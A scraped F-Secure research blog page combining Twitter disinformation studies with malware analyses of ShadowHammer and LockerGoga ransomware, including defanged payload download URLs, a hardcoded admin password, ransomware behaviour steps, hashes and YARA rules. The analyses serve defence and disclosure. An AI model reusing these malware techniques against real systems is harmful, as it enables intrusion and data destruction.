The latest news and insights from F-Secure

Blog

Live Threats Detections

Time
Country
Detection Name
World Map

Our Story

Nobody knows cyber security like F-Secure. For three decades, F-Secure has driven innovations in cyber security, defending tens of thousands of companies and millions of people.

With unsurpassed experience in endpoint protection as well as detection and response, F-Secure shields enterprises and consumers against everything from advanced cyber attacks and data breaches to widespread ransomware infections.

 

About us

For F-Secure, cyber security is more than a product—it's how we see the world.

Read more
 

Career at F-Secure

Join us if you want to make a difference—In the world, for us and for yourself

Read more
 

For Investors

Growing revenue & healthy profitability & strong balance sheet

Read more

Awards and references

Find out why F-Secure has the best protection in the world.

AV-TEST certification for F-Secure SAFE
Digital Citizen Awards — the most innovative antivirus product of 2017
AV-Test Best Protection 2018 PSB Computer Protection
Best SMB Security Product Protection Service for Business
#####EOF##### News from the Lab

Discovering Hidden Twitter Amplification

As part of the Horizon 2020 SHERPA project, I’ve been studying adversarial attacks against smart information systems (systems that utilize a combination of big data and machine learning). Social networks fall into this category – they’re powered by recommendation algorithms (often based on machine learning techniques) that process large amounts of data in order to display relevant information to users. As such, I’ve been trying to determine how attackers game these systems. This post is a follow-up to F-Secure’s recent report about brexit-related amplification.

In this article, I’d like to share methodology I’ve been developing to observe “behind the scenes” amplification on Twitter. I will illustrate how I have applied this methodology in an attempt to discover political disinformation around pro-leave brexit topics, and to hopefully further clarify how much overlap exists between accounts promoting far-right ideology in the US, and accounts pushing pro-leave ideology in the UK.

Step 1: Collect a list of candidate accounts

I wrote a simple crawler using the Twitter API. It does the following:

  • Pull a new target account from a queue of targets
  • Gather Twitter user objects of the accounts the target is following
  • For each user object, run a set of string matches and regular expressions against text fields (name, description, screen_name)
    • In this experiment, string searches included things like “yellowvest”, “hate the eu”, “istandwithtommy”, “voted brexit”, “qanon”, and “maga”.
  • Check the list of accounts followed against a pre-compiled list of roughly 500 influencer accounts. This list was collected over several months by hand-visiting Twitter accounts identified through data analysis and manual research.
  • If any of the above matched, add the account name to the queue (if it isn’t already on it, and if we haven’t already queried the account), and save the user object for later processing steps.
  • Also, save a node-edge graph representation of the network, as it is crawled
  • Repeat

The crawler was seeded with a couple of random troll accounts I found while browsing Twitter.

As with any Twitter account crawl, the process never finishes – the length of the queue grows faster than it can be consumed. I ran the crawler for just a couple of days (between April 2nd and 3rd 2019), during which it collected about 260,000 “interesting” Twitter user objects. For this experiment, I filtered the objects into a few different groups:

  • Filtering by account creation date, in order to find recently created accounts. (during, or after March 2019). This yielded a list of just over 2,000 accounts.
  • By filtering on strings in description and name fields, I collected lists of accounts self-associating with Tommy Robinson. This yielded a list of just over 900 accounts.
  • By filtering based on who the accounts were following, I collected a list of accounts that followed at least 10 of the pre-compiled list of influencer accounts. This yielded a list of just over 23,000 accounts.

Step 2: Observe candidate account behaviour

I wrote a second script that uses Twitter API’s statuses/filter functionality to follow the activity of a list of candidate accounts collected in the previous step. I ran this script with the first two candidate lists – Twitter’s standard API allows a maximum of 5,000 accounts to be followed in this way. Full tweet objects were pre-processed (abreviated to include only metadata I was interested in looking at), and written sequentially to disk for later processing. I allowed this script to run for a few days (between April 2nd and 3rd 2019), in order to capture a representative sample of the candidate accounts’ activities. I then used Python and Jupyter notebooks to analyze the collected data.

Results

The “new accounts” group tweeted about a variety of topics, and retweeted accounts from both the US and UK. Here’s a graph visualization of their activity:

Names in larger fonts indicate accounts that were retweeted more often.

In comparison, the list of “tommy” accounts promoted very samey content, giving rise to this rather awkward visual:

When analyzing the collected data, I imediately noticed that both groups were promoting a few almost brand new accounts. Here’s the most prominent of them – BringUkip. Notice how the account’s pinned tweet doesn’t even spell UKip party leader Gerard Batten’s name correctly. I suspect this isn’t an official UKIP account.

During the (less than two days) collection period, close to 850 of the 2000 accounts in the “new accounts” group retweeted BringUkip almost 1800 times. In that same time span, over 600 of the approximately 900 accounts in the “tommy” group retweeted BringUkip close to 1000 times.

Here are some of the other brand new accounts being amplified by the “new accounts” group:

Some really surprising phenomena can be observed in the above chart. For instance, Fish_171, an account that was created on March 2nd 2019 (almost exactly a month ago) has over 12,000 followers (and follows almost 11,000 accounts). WillOfThePpl11, an account that was created on March 16th 2019 (about two weeks ago at time of writing) has published over 10,000 Tweets.

Here’s a similar chart, but for the “tommy” group. Not as much new account amplification was being done by those accounts:

Here are a few of the other new accounts being promoted by these groups. Red26478680 was created on March 30th 2019 (4 days ago at time of writing).

I happened to spot this account while browsing Twitter on my way into work this morning. It was promoting itself in a reply to Breaking911 (one of the accounts on my list of influencers):

Another hotly promoted account is HomeRuleNow, an account that was created on March 29th 2019 (5 days ago).

This account self-identifies with #Bluehand – a group that Twitter appears to have been actively clamping down on. This account accrued over 1000 followers in the five days since it was created.

Here’s one more – AGirlToOne:

This account was created on March 23rd 2019 (just over a week ago). It was retweeted by over 1000 of the approximately 2000 “new accounts” users during the collection period.

While browsing through a random selection of timelines in the “new accounts” group, I found some interesting things. Here is a tweet from one of the users (ianant4) discussing how to evade Twitter’s detection mechanisms:

I also found eggman25503141:

This account is quite bot-like. All tweets have the same format, starting with “YOU WONT SEE THIS ON #BBCNEWS”, an extra line break, and then a sentence, followed by a few pictures. All of this account’s tweets promote extreme anti-islamic content. Most of this account’s tweets have received no engagement. Except this one:

The above tweet received, at the time of capture, 48 replies, 374 retweets, and 254 likes. Many of the accounts collected in the first step of my collection process participated in retweeting the above.

For fun, here’s one of the seed accounts used.

The methodology outlined in this article works well due to the fact that the studied demographic uses plenty of self-identifying keywords in their Twitter descriptions. For other subject matter, gathering a candidate list may be more problematic.

Given that the account list I gathered was based on following-follower relationships between Twitter accounts, it is clear that many pro-brexit Twitter accounts and MAGA accounts follow each other. The content these accounts promote is, however, somewhat separate, and dependent on the account’s persona (MAGA versus brexit). Some accounts I looked at promoted both types of content, but they were in the minority. Most of the accounts observed in this research were/are being operated, at least in part, by actual human beings. In between heavily retweeting content, these accounts occasionally publish original tweets, converse with each other, and troll other people. I believe the results of this piece of research strongly prove the existence of a well-organized and potentially large network of individuals that are creating and operating multiple Twitter accounts in order to purposefully promote political content directly under our noses.



Mira Ransomware Decryptor

We investigated some recent Ransomware called Mira (Trojan:W32/Ransomware.AN) in order to check if it’s feasible to decrypt the encrypted files.

Most often, decryption can be very challenging because of missing keys that are needed for decryption. However, in the case of Mira ransomware, it appends all information required to decrypt an encrypted file into the encrypted file itself.

Encryption Process

The ransomware first initializes a new instance of the Rfc2898DeriveBytes class to generate a key. This class takes a password, salt, and iteration count.

1

The password is generated using the following information:

  • Machine name
  • OS Version
  • Number of processors

2

The salt, on the other hand, is generated by a Random Number Generator (RNG):

3

The ransomware then proceeds to use the Rijndael algorithm to encrypt files:

Untitled

After encryption, it appends a ‘header‘ structure to the end of the file.

This header conveniently contains the salt and the password hash. In addition to that, the iteration count is hard-coded into the sample, in this case, the value was 20.

By retrieving the password, salt, and the iteration count from the ransomware itself, we were able to obtain all the information needed to create a decryption tool for the encrypted files.

Decryption tool

You can download our decryption tool from here.

Here’s a video of how you can use our tool:

 



A Hammer Lurking In The Shadows

And then there was ShadowHammer, the supply chain attack on the ASUS Live Update Utility between June and November 2018, which was discovered by Kaspersky earlier this year, and made public a few days ago.

In short, this is how the trojanized Setup.exe works:

  1. An executable embedded in the Resources section has been overwritten by the first-stage payload.
  2. The program logic has been modified in such a way that instead of installing a software update, it executes a payload implemented as a shellcode.
  3. The payload enumerates the MAC addresses on the victim’s system, creates MD5 hashes of them and searches these hashes in a large array of hardcoded values.
  4. If there is a match, it downloads hxxps://asushotfix.com/logo.jpg or hxxps://asushotfix.com/logo2.jpg, depending on the payload variant. This is meant to be a second-stage x86 shellcode since it will try to execute it within its own process. However, these URLs are not accessible anymore.
  5. If no match, create or update a file “idx.ini”. (Added in July 2018 – more details below)

If you’re more interested in the technical details, our colleagues at Countercept have made an excellent write-up here.

More researchers jumped on this threat and wrote their own analysis as well, such as here and here.

In this post we will focus more on the differences between the variants we have discovered, and how the payload evolved over time. We will also cover some findings about the MAC addresses.

Timeline

  1. June 2018: The beginning.

    In the first known versions, the embedded executable in the Setup.exe resource section has been partially overwritten by another smaller executable that contains the shellcode.
    The executable is not encrypted, and has a PDB string which is remarkable to say the least:

    D:\C++\AsusShellCode\Release\AsusShellCode.pdb

    The number of targeted MAC address hashes was very low. In the earliest sample we found, there were only 18 devices in scope.

    If there is a match, the shellcode will download the file from the following URL and execute it.

     hxxps://asushotfix.com/logo.jpg
  2. Early July 2018: Introduction of the INI file.

    Some interesting functionality was added. If there is NO match with any of the targeted MAC addresses (which will be the case for most devices), the payload will create or update an INI file “idx.ini”.3 different entries are written with a date value corresponding to 7 days/one week later. Example content if it was created today (2019-03-29):

    [IDX_FILE]
    XXX_IDN=2019-04-05
    XXX_IDE=2019-04-05
    XXX_IDX=2019-04-05

    The INI file is stored 2 levels up in the directory structure from where setup.exe is stored.

    So if the executable path is

    C:\Program Files (x86)\ASUS\ASUS Live Update\Temp\6\Setup.exe

    then the INI file will be dropped as

    C:\Program Files (x86)\ASUS\ASUS Live Update\idx.ini

    More MAC hashes were added per iteration, increasing the number to over 200 in a sample compiled on 23 July 2018.

  3. Mid August 2018: Going stealthy.

    Then there is a hiatus of a few weeks. Most people were enjoying summer at that time, but it looks like these actors spent that period on rewriting a few things to hide their payload better.The malicious payload is now fully encrypted, and has become real shellcode, i.e. not part of an executable image. Consequently, the PDB string is gone, and there is no compilation timestamp anymore, which makes determining the exact date of creation trickier. From here on, we are resorting to the date of first seen.The list of targets grew again, nearly 300 devices now.
  4. Early September 2018: A new URL.

    A small but interesting change was that the URL changed to

    hxxps://asushotfix.com/logo2.jpg

    Also, a few more hashes were added, totaling 307 entries, the largest number we have encountered.

  5. Late September 2018: Revisiting the targets.

    Until now, the evolution of the targeted MAC addresses was very consistent: the actors have only added targets. In other words, an older sample always contained a subset of the newer sample. Things have changed during the final period of the attack which lasted for more than a month. The number of hashes started fluctuating – with each new variant, some got removed, while new ones were added. Perhaps the threat actors managed to come up with a shortlist of targets of interest this time?

MAC Addresses Observations

Looking at the list of MAC addresses, it appears that some of them are wireless adapters from different manufacturers. It’s possible that the attackers gathered these by listening on a wireless network. Also, it suggests that the targets are mostly laptops as most of the wireless adapters seem to be Intel / Azurewave / Liteon.

If you notice in the chart above, there were about 6 MAC addresses that didn’t resolve to any vendors:

00ff5eXXXXXX
00ff91XXXXXX
00ffaaXXXXXX
00ffd9XXXXXX
0c5b8f279a64
fa94c2XXXXXX


0c:5b:8f:27:9a:64, which was found in 8 samples, appears to be a Huawei wireless chip address. It is not assigned to Huawei, but looks like it’s being used in
Huawei E3372 devices, which is a 4G USB stick. This particular MAC address is always checked along with a specific Asustek Computer Inc. MAC address.

00ff5eXXXXXX is always checked along with a VMWare MAC address, which suggests that this MAC address is used in virtualized environments.

In the most recent sample, there were a total of 18 devices of interest. But here are those that were checked as matches:

  • Hon Hai Precision Ind. Co.,ltd. and Vmware, Inc.
  • Azurewave Technology Inc. and Asustek Computer Inc.
  • Intel Corporate and Asustek Computer Inc.
  • Vmware, Inc. and the 00ff5eXXXXXX MAC address

Indicators of Compromise

Hashes

SHA1 DATE (COMPILATION TIMESTAMP/FIRST SEEN) # OF HARDCODED MAC ADDRESSES # OF TARGETED DEVICES
b0416f8866954196175d7d9a93b9ab505e96712c 2018-06-12 24 18
5039ff974a81caf331e24eea0f2b33579b00d854 2018-06-28 69 50
e01c1047001206c52c87b8197d772db2a1d3b7b4 2018-07-10 75 55
c6bd8969513b2373eafec9995e31b242753119f2 2018-07-16 156 117
2c591802d8741d6aef1a278b9aca06952f035b8f 2018-07-17 197 152
0595e34841bb3562d2c30a1b22ebf20d31c3be86 2018-07-23 294 208
df4df416c819feb06e4d206ea1ee4c8d07c694ad 2018-08-13 404 287
8e0dfaf40174322396800516b282bf16f62267fa 2018-09-05 433 307
4a8d9a9ca776aaaefd7f6b3ab385dbcfcbf2dfff 2018-09-25 141 86
e793c89ecf7ee1207e79421e137280ae1b377171 2018-09-30 75 41
9f0dbf2ba3b237ff5fd4213b65795595c513e8fa 2018-10-12 22 15
e005c58331eb7db04782fdf9089111979ce1406f 2018-10-19 24 18


YARA Rules

// older samples - check the PDB string in the shellcode
rule shadowhammer_pdb
{
    strings:
        $str_pdb = "AsusShellCode.pdb" ascii nocase
    condition:
        all of them
}
 
// newer samples - check manual patches in the setup.exe
 
rule shadowhammer_patch
{
    strings:
        $str_msi  = "\\419.msi" ascii wide nocase
        $str_upd = "ASUS Live Updata" ascii wide nocase
        $str_ins = "Asusaller Application" ascii wide nocase
    condition:
        2 of them
}
Tags:


Analysis of LockerGoga Ransomware

We recently observed a new ransomware variant (which our products detect as Trojan.TR/LockerGoga.qnfzd) circulating in the wild. In this post, we’ll provide some technical details of the new variant’s functionalities, as well as some Indicators of Compromise (IOCs).

Overview

Compared to other ransomware variants that use Window’s CRT library functions, this new variant relies heavily on the less commonly used Boost library. For example, instead CRT’s rename function, it uses boost::filesystem::rename. The change makes technical analysis more difficult for researchers, as it makes function identification harder.

The functionalities for file enumeration and file encryption are split into different processes. File path sharing happens using the Boost.Interprocess library, which makes it harder to analyze the processes separately.

File encryption

If we execute the sample without any arguments, it moves the executable to the %TEMP% directory with hard coded name “tgytutrc{number}.exe” and executes it with the “-m” argument (where “m” stands for “master process”):

As we can see on the screenshot, the main executable uses functions from Boost library to copy and execute the sample.

exec_from_first

first_create_process_api_monitor

The main functionality is inside the “master” process, it enumerates files on the infected system and executes child processes to encrypt files.

If we provide additional argument “-l”, the process will create “C:\\.log.txt” file and write file paths and error messages.

To parse command line arguments, the sample uses Boost.Program_options library (ref. screenshot below)

master_process

Before starting the encryption phase, the “master” process enumerates sessions and logs off from all but the current process’s session.

The process uses ProcessIdToSessionId function to get a session associated with the current process.

enum_sessions_second

This is a list of active sessions on a test machine since session “1” is the session of the process, it logs off only from session “0”:

enumerate_sessions

After that, the “master” process changes the password for all administrator accounts to “HuHuHUHoHo283283@dJD“.

I’ve created a standard user, but it only changes the password for administrator accounts:

second_changes_admin_passwords

The “master” process creates a “shared memory” using the Boost.Interprocess library and executes child processes (in the same executable) with the argument “-i SM-tgytutrc -s”, where “-i ” specifies a shared section name and “-s” stands for “slave”.

According to Wikipedia: “shared memory is memory that may be simultaneously accessed by multiple programs with an intent to provide communication among them or avoid redundant copies

On the screenshot, we see that, after changing passwords, it uses Boost library to initialize shared memory and execute child processes (“slave” processes):

change_admi_pswds_create_subProc

slave_proc

Next, the “master” process enumerates files and writes their paths (encoded with Base64) in the shared memory.

The process uses Boost::Filesystem library to query paths, files, and directories:

boost_lib_files_enum

File paths are encoded with Base64:

shared_memory

Child processes decode the data from the shared memory.
The data on the shared memory has the following structure: The first “DWORD” represents the file index, while the second one represents the size of the “base64” encoded data:

base64_encoded_from_third_

After decoding a file path, a child process generates a key/IV pair using the Crypto++ library.

OS_RNG” function uses CryptoGenRandom function from Windows, another function is from Crypto++ library to generate a random numbers:

third_generate_key_iv

Before the encryption, a “slave” process renames a file using Boost::Filesystem::rename function:

third_remove_locked_and_rename_to_lockedNext, the child process encrypts the file’s content using the Rijndael algorithm. It also appends the generated key/IV pair in an encrypted form to the end of the file. The key/IV pair is encrypted with the public key, which is embedded in the executable:

third_append_enc_key_iv

After it encrypts a file, a child process overwrites the first byte of the encoded data in shared memory with a “0” byte.

overwrite_first_byte_after_reading_filePath

Network changes

After the encryption phase, the “master” process enumerates all network interfaces and disables them.

List of active adapters on my test machine:

list_of_adapters

The “master” process disables them one by one:

disable_interfaces

Next, it deletes the executable via “.bat” file which contains commands to delete the executable and the bat file itself.

second_end_delete_

At the end it logs off the current process’s session:

second_logoff_current_session

Conclusion

Overall, the latest variant of the LockerGoga ransomware is not complex or complicated. Because it uses the Boost library and Crypto++ instead of the more common CRT library functions however, it does make it a bit more troublesome for a threat researcher to analyze the sample.

Indicators of compromise (IOCs)

SHA256:

  • C97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15

Hard coded mutexes:

  • MX-tgytutrc

Directory with malicious executables:

  • %APPDATA%\Local\Temp\tgytutrc8.exe


Analysis Of Brexit-Centric Twitter Activity

This is a rather long blog post, so we’ve created a PDF for you to download, if you’d like to read it offline. You can download that from here.

Executive Summary

This report explores Brexit-related Twitter activity occurring between December 4, 2018 and February 13, 2019. Using the standard Twitter API, researchers collected approximately 24 million tweets that matched the word “brexit” published by 1.65 million users.

A node-edge graph created from the collected data was used to delineate pro-leave and pro-remain communities active on Twitter during the collection period. Using these graphs, researchers were able to identify accounts on both sides of the debate that play influential roles in shaping the Brexit conversation on Twitter. A subsequent analysis revealed that while both communities exhibited inorganic activity, this activity was far more pronounced in the pro-leave group. Given the degree of abnormal activity observed, the researchers conclude that the pro-leave Twitter community is receiving support from far-right Twitter accounts based outside of the UK. Some of the exceptional behaviors exhibited by the pro-leave community included:

  • The top two influencers in the pro-leave community received a disproportionate number of retweets, as compared to influencer patterns seen in the pro-remain community
  • The pro-leave group relied on support from a handful of non-authoritative news sources
  • A significant number of non-UK accounts were involved in pro-leave conversations and retweet activity
  • Some pro-leave accounts tweeted a mixture of Brexit and non-Brexit issues (specifically #giletsjaunes, and #MAGA)
  • Some pro-leave accounts participated in the agitation of French political issues (#franceprotests)

The scope of this report is too limited to conclusively determine whether or not there is a coordinated astroturfing campaign underway to manipulate the public or political climate surrounding Brexit. However, it does provide a solid foundation for more investigation into the matter.

Introduction

Social networks have come under fire for their inability to prevent the manipulation of news and information by potentially malicious actors. These activities can expose users to a variety of threats.  And recently, the spread of disinformation and factually inaccurate statements to socially engineer popular opinion has become a significant concern to the public. Of particular concern is the coordination of actions across multiple accounts in order to amplify specific content and fool underlying algorithms into falsely promoting amplified content to users in their news feeds, searches, and recommendations. Participants in these campaigns can include: fully automated accounts (“bots”), cyborgs (accounts that use a combination of manual and automated actions), full-time human operators, and users who inadvertently amplify content due to their beliefs or political affiliations. Architects of sophisticated social engineering campaigns, or astroturfing campaigns (fabricated social network interactions designed to deceive the observer into believing that the activity is part of a grass-roots campaign), sometimes create and operate convincing looking personas to assist in the propagation of content and messages relevant to their cause. It is extremely difficult to distinguish these “fake” personas from real accounts.

Identifying suspicious activities in social networks is becoming more and more difficult. Adversaries have learned from their past experiences, and are now using better tactics, building better automation, and creating much more human-like sock puppets. Social networks now employ more sophisticated algorithms for detecting suspicious activity, and this forces adversaries to develop new techniques aimed at evading those detection algorithms. Services that sell Twitter followers, Twitter retweets, YouTube views, YouTube subscribers, app store reviews, TripAdvisor reviews, Facebook likes, Instagram followers, Instagram likes, Facebook accounts, Twitter accounts, eBay reviews, Amazon ratings, and anything else you could possibly imagine (related to social networks) can be purchased cheaply online. These services can all be found with simple web searches. For the more tech-savvy, a plethora of tools exist for automating the control of multiple social media accounts, for automating the creation and publishing of text and video-based content, for scraping and copying web sites, and for automating search engine optimization tasks.  As such, more complex analysis techniques, and much more in-depth study of the data obtainable from social networks is required than ever before.

Because of its open nature, and fully-featured API support, Twitter is an ideal platform for research into suspicious social network activity. By studying what happens on Twitter, we can gain insight into the techniques adversaries use to “game” the platform’s users and underlying algorithms. The findings from such research can help us build more robust recommendation mechanisms for both current and future social networking platforms.

Background

Between December 4, 2018 and February 13, 2019, we used the standard Twitter API (from Python) to collect Twitter data against the search term “brexit”. The collected data was written to disk and then subsequently analyzed (using primarily Python and Jupyter notebooks) in order to search for suspicious activity such as disinformation campaigns, astroturfing, sentiment amplification, or other “meddling” operations.

At the time of writing, our dataset consisted of approximately 24 million tweets published by over 1.65 million users. 18 million of those were retweets published by 1.5 million users from tweets posted by 300,000 unique users. The dataset included 145,000 different hashtags, 412,000 different URLs and 700,000 unique tweets.

Suspicious activity (activity that appears inorganic or unnatural) can be difficult to separate from organic activity on a social network. For instance, a tweet from user with very few followers will normally fall on deaf ears. However, that user may once in a lifetime post something that ends up going “viral” because it was so catchy it got shared by other users, and eventually by influencers with many followers. Malicious actors can amplify a tweet to similar effect by instructing or coordinating a large number of accounts to share an equally unknown user’s tweet. This can be achieved via bots or manually operated accounts (such as what was achieved by Tweetdeckers in 2017 and 2018). Retweets can also be purchased online. Vendors that provide such services publish the purchased retweets from their own fleets of Twitter accounts which likely don’t participate in any other related conversations on the platform. Retweets purchased on this way are often published over a period of time (and not all at once, since that would arouse suspicion). Hence, detecting that a tweet has been amplified by such a service (and identifying the accounts that participated in the amplification) is only possible if those retweets are captured as they are published. Finding a small group of users that retweeted one account over several days, and that may have themselves appeared only once in a dataset containing over 20 million tweets and 300,000 users, is rather difficult.

Groups of accounts that heavily retweet similar content or users over and over can be indicative of automation or malicious behaviour, but finding such groups can sometimes be tricky. Nowadays sophisticated bot automation exists that can easily hide the usual tell-tale signs of artificial amplification. Automation can be used to queue a list of tweets to be published or retweeted, randomly select a portion of potentially thousands of slave accounts, and perform actions at random times, while specifically avoiding tweeting at certain times of the day to give the impression that real users are in control of those accounts. Real tweets and tweets from “share” buttons on news sites can be mixed with retweets to improve realism.

Another approach to finding suspicious behaviour on Twitter is to search for account activity patterns indicative of automation. In a vacuum, these patterns cannot be used to conclusively determine whether an account is automated, or designed to act as part of an astroturfing or disinformation campaign. However, identifying accounts with one or more suspicious traits can help lead researchers to other accounts, or suspicious phenomena, which may ultimately lead to finding evidence of foul-play. Here are some traits that may indicate suspiciousness:

  • While it is entirely possible for a bored human to tweet hundreds of times per day (especially when most of the activity is pressing the retweet button), accounts with high tweet volumes can sometimes be indicative of automation. In fact, some of the accounts we found during this research that tweeted at high volume tended to publish hundreds of tweets at certain times during the day, whilst remaining dormant the rest of the time, or published tweets at a uniform volume, with no pauses for sleep.
  • Accounts that are just a few days or weeks old tend to not have thousands of followers, unless they belong to a well-known celebrity who just joined the platform. New accounts that develop huge followings in a short period of time are suspicious, unless those followings can be explained by particular activity or some sort of pre-existing public status.
  • Accounts with a similar number of followers and friends can occasionally be suspicious. For instance, accounts controlled by a bot herder are sometimes programmatically instructed to follow each other, and end up having similar follower/friends counts. However, mechanisms also exist that promote a “follow-back” culture on Twitter. These mechanisms are often present in isolated communities, such as the far-right Twittersphere. Commercial services also exist that automate follow-back actions for accounts that followed them. The fact that the list of accounts followed by a user is very similar to that user’s list of friends can, unfortunately, be indicative of any of the above.
  • Accounts that follow thousands of other accounts, but are themselves followed by only a fraction of that number can occasionally be indicative of automation. Automated accounts that advertise adult services (such as porn, phone sex, “friend finders”, etc.) use this tactic to attract followers. However, there are also certain communities on Twitter that tend to reciprocate follows, and hence following a great deal of accounts (including “egg” accounts) is a way of “fishing” for follow-backs, and normal in those circles.
  • While it is true that many users on Twitter tend to like and retweet content a lot more than they write their own tweets, accounts that retweet more than 99% of the time might be controlled by automation (especially since it’s a very easy thing to automate, and can be used to boost the engagement of specific content). A few accounts that we encountered during our research had one pinned tweet published by “Twitter Web Client” whilst the rest of the account’s tweets were retweets published by “Twitter for Android”. This sort of pattern raises suspicion, since it could indicate that the account was manually created (and seeded with a single hand-written tweet) by a user at a computer, and then subsequently automated.
  • Accounts that publish tweets using apps created with the Twitter API, or from sources that are often associated with automation are not conclusively suspicious, but may warrant further examination. This is covered more extensively later in the article.
  • Temporal analysis techniques (discussed later in this article) can reveal robot-like behaviour indicative of automation. Some accounts are automated by design (e.g. automated marketing accounts, news feeds). However, if an account behaves in an automated fashion, and publishes politically polarizing content, it may be cause for suspicion.

During the first few weeks of our research, we focused on building up an understanding of the trends and topology of conversations around the Brexit topic. We created a simple tool designed to collect counts and interactions from the previous 24 hours’ worth of data, and present the results in an easily readable format. This analysis included:

  • counts of how many times each user tweeted
  • counts of how many times each user retweeted another user (amplifiers)
  • counts of how many times each user was retweeted by another user (influencers)
  • counts of hashtags seen
  • counts of URLs shared
  • counts of words seen in tweet text
  • a map of interactions between users

By mapping the interactions between users (users interact when they retweet, mention, or reply to each other), a node-edge graph representation of observed conversations can be built. Here’s a simple representation of what that looks like:

Lines connecting users in the diagram above represent interactions between those users. Communities are groups of nodes within a network that are more densely connected to one another than to other nodes, and can be discovered using community detection algorithms. To visualize the topology of conversation spaces, we used a graph analysis tool called Gephi, which uses the Louvain Method for community detection. For programmatic community detection purposes, we used the “multilevel” algorithm that is part of the python-igraph package (which is very similar to the algorithm used in Gephi). We often used graph analysis and visualization techniques during our research, since they were able to fairly accurately partition conversations between large numbers of accounts. As an example of the accuracy of these tools, the illustration below is a graph visualization created using about 24 hours’ worth of data collected around December 4, 2018.

Names with a larger font indicate Twitter accounts that are mentioned more often. It can be noted from the above illustration that that conversations related to pro-Brexit (leave) topics are clustered at the top (in orange) and conversations related to anti-Brexit (remain) topics are clustered at the bottom (in blue). The green cluster represents conversations related to Labour, and the purple cluster contains conversations about Scotland. People familiar with the Twitter users in this visualization will understand how accurately this methodology managed to separate out each political viewpoint. Visualizations like these illustrate that separate groups of users discuss opposing topics, with very little interaction between the two groups. Highly polarized issues, such as the Brexit debate (and many political topics around the world) usually generate graph visualizations that look like the above.

December 11: #franceprotests hashtag

On December 11, 2019, we observed the #franceprotests hashtag trending in our data (something we had not previously seen). Isolating all tweets from 24 hours’ worth of previously collected data, we found 56 separate tweets that included the #franceprotests hashtag. We mapped interactions between these tweets and the users that interacted with them, resulting in this visualization:

From the above visualization, we can clearly observe a large number of users interacting with a single tweet. This particular tweet (id: 1069955399917350912) was responsible for a majority of the occurrences of the #franceprotests hashtag on that day. This is the tweet:

The reason this tweet showed up in our data was because of the presence of the #BREXIT hashtag. From this 24 hours’ worth of collected data, we isolated a list of 1047 users that retweeted the above tweet. Interactions between these users from across the 24-hour period looked like this:

Of note in the above visualization are accounts such as @Keithbird59Bird (which retweeted pro-leave content at high volume across our entire dataset), @stephenhawes2 (a pro-leave account that exhibits potentially suspicious activity patterns), @SteveMcGill52 (an account that tweets pro-leave, anti-muslim, and US-related right wing content at high volume). The @lvnancy account that published the original tweet is a US-based alt-right account with over 50,000 followers.

At the time of writing, 23 of these 1047 accounts (2.2%) had been suspended by Twitter.

We performed a Twitter history search for “#franceprotests” in order to determine which accounts had been sharing this hashtag. The search captured roughly 5,800 tweets published by just over 3,617 accounts (retweets are not included in historical searches). Searching back historically allowed us to determine that the current wave of #franceprotests tweets started to pick up momentum around November 28, 2018. In addition to the #franceprotests hashtag, this group of users also published tweets with hashtags related to the yellow vests movement (#yellowvest, #yellowjackets, #giletsjaunes), and to US right-wing topics (#MAGA, #qanon, #wwg1wga). Interactions between the accounts found in that search look like this:

Some of the accounts in this group are quite suspicious looking. For instance, @tagaloglang is an account that claims to be themed towards learning the Tagalog language. The pinned tweet at the top of @tagaloglang’s timeline makes the account appear in-theme when the page loads:

However, scroll down, and you’ll notice that the account frequently publishes political content.

Another odd account is @HallyuWebsite – a Korean-themed account about Kpop. Here’s what the account looks like when you visit it:

Again, this is just a front. Scroll down and you will see plenty of political content.

Both @tagaloglang and @ HallyuWebsite look like accounts that might be owned by a “Twitter marketing” service that sells retweets.

The 5,800 tweets captured in this search had accumulated a total of 53,087 retweets by mid-February 2019. Here are a few of the tweets that received the most retweets:

At the time of writing, 66 of the 3,617 accounts (1.83%) identified as historically sharing this hashtag had been suspended.

Throughout our research, we observed many English-language accounts participating in activism related to the French protests, often in conjunction with UK, US, and other far-right themes. We would imagine that a separate research thread devoted to the study of far-right activism around the French protests would likely expose plenty of additional suspicious activity.

December 20: suspicious pro-leave amplification

During our time spent studying the day-to-day user interactions, we became familiar with the names of accounts that most often tweeted, and of those that were most often retweeted. On December 20, 2018 we noticed a few accounts that weren’t normally highly retweeted that made it onto our “top 50” list. We isolated the interactions between these accounts, and the accounts that retweeted them, and produced the following visualization:

As illustrated above, several separate groups of accounts participated in the amplification of a small number of tweets from brexiteer30, jackbmontgomery, unitynewsnet and stop_the_eu. Here is a visualization of tweets from those accounts, and the users who interacted with them:

5,876 accounts participated in the amplification captured on December 20, 2018. In order to discover what other accounts these 5,876 accounts were amplifying, we collected the last 200 tweets from each of the accounts, and mapped all interactions found, generating this graph:

Zooming in on this, we can see that the yellow cluster at the bottom contains US-based “alt-right” Twitter personalities (such as Education4Libs, and MrWyattEarpLA – an account that is now suspended), and US-based non-authoritative news accounts (such as INewsNet).

The large blue center cluster contains many EU-based right-wing accounts (such as Stop_The_EU, darrengrimes_, and BasedPoland), and non-authoritative news sources (such as UnityNewsNet, V_of_Europe). It also contains AmyMek, a radical racist US Twitter personality with over 200,000 followers.

The orange cluster at the top contains interactions with pro-remain accounts. Although we weren’t expecting to see any interactions of this nature, they were most likely introduced by accounts in the dataset that retweet content from both sides of the debate (such as Brexit-themed tweet aggregators).

Many of the 5,876 accounts that participated in the December 20, 2018 amplification contained #MAGA (Make America Great Again hashtag commonly used by the alt-right), had US cities and states set as their locations, or identified as American in one way or another. At the time of writing, 79 of these 5,876 accounts (1.34%) had been suspended by Twitter.

February 12: non-authoritative news accounts

The presence of interactions with a number of non-authoritative, pro-leave news sources that are supportive of far-right activist Tommy Robinson (such as UnityNewsNet, PoliticalUK, and PoliticaLite) in this data led us to explore the phenomenon a little further. We ran analysis over our entire collected dataset in order to discover which accounts were interacting with, and sharing links to these sources. The data reveals that some users retweeted the accounts associated with these news sources, others shared links directly, and some retweeted content that included those links. Using our collected data, we were able to build up a picture of how these links were being shared between early December and mid-February. The script we ran looked for interactions with the following accounts: “UnityNewsNet”, “AltNewsMedia”, “UK_ElectionNews”, “LivewireNewsUK”, “Newsflash_UK”, “PoliticsUK1”, “Politicaluk”, “politicalite”. It also performed string searches on any URLs embedded in tweets for the following: “unitynewsnet”, “politicalite”, “altnewsmedia”, “www-news”, “patriotnewsflash”, “puknews”.

